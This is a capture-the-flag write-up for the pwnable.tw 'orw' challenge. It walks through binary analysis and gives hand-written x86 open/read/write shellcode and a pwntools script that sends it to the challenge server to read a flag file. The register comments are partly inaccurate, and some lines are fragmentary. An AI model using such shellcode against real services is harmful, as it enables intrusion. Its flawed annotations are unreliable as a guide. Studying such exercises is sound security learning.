Exercise:
Analysis
File:
File 32 bits, dynamically linked, not stripped: here is keywords of this program
Checksec
[⛔️] Buffer overflow
[✔️] Shellcode attack
IDA 32bits
- Seeing, you will know that the read function's arguments will be written to the stack in reverse order (Little endian)
- return value of read function:
the number of bytes read is returned (zero indicates end of file), and the file position is advanced by this number. It is not an error if this number is smaller than the number of bytes requested;
đọc thêm tại đây ((void ()(void))shellcode)();
: such as a pointer
This is the shellcode's memory area to store data, it's located in the .bss part of the memory.
PEDA
I use the peda to double-check some information.
$shellcode_address = 0x804a060
.
check mmap:
$shellcode is in the .bss area and is moved to the eax register and then called again
and eax can only hold 200 bytes, ie: what I analyzed above is almost correct 😁
Exploit
Normally, we just need to send the shellcode to the server
But in this challenge, the author only allows the use of open, read, write to server.
Our aim is: Read the flag from /home/orw/flag
So script of me is: open file => read file => write to monitor
- Push into stack
push 0x0
push 0x67616c66 ;flag
push 0x2f77726f ;orw/
push 0x2f656d6f ;ome/
push 0x682f2f2f ;///h
- SYSTEM_Open
xor ecx, ecx
xor eax, eax
mov ebx, esp ;esp -> ebx, ebx- * file : esp
mov eax, 0x05 ;eax mode = 5, open
int 0x80 ;syscall
- SYSTEM_Read
mov eax, 0x03 ;eax mode = 3, read
mov ebx, eax ;ebx-fd = eax, handle->/home/orw/flag (3)
mov ecx,esp ;ecx-* buf: esp
mov edx, 0x40 ;edx-size: 0x40
int 0x80 ;syscall
- SYSTEM_Write
mov eax, 0x04 ;eax mode = 4, write(4)
mov ebx, 0x01 ;ebx-fd: stdout(1)
int 0x80 ;syscall
So all of shellcode can write is:
push 0x0
push 0x67616c66 push 0x2f77726f push 0x2f656d6f push 0x682f2f2f
xor ecx, ecx
xor eax, eax
mov ebx, esp mov eax, 0x05
int 0x80
mov eax, 0x03 mov ebx, eax
mov ecx,esp
mov edx, 0x40
int 0x80
mov eax, 0x04 mov ebx, 0x01
int 0x80
I use it to give shellcode
Finally, I have a script python3 to exploit:
from pwn import * r = remote("chall.pwnable.tw",10001) shellcode = b"\x6A\x00\x68\x66\x6C\x61\x67\x68\x6F\x72\x77\x2F\x68\x6F\x6D\x65\x2F\x68\x2F\x2F\x2F\x68\x31\xC9\x31\xC0\x89\xE3\xB8\x05\x00\x00\x00\xCD\x80\xB8\x03\x00\x00\x00\x89\xC3\x89\xE1\xBA\x40\x00\x00\x00\xCD\x80\xB8\x04\x00\x00\x00\xBB\x01\x00\x00\x00\xCD\x80" r.sendline(shellcode)
print(r.recvuntil(b"shellcode:"))
r.interactive()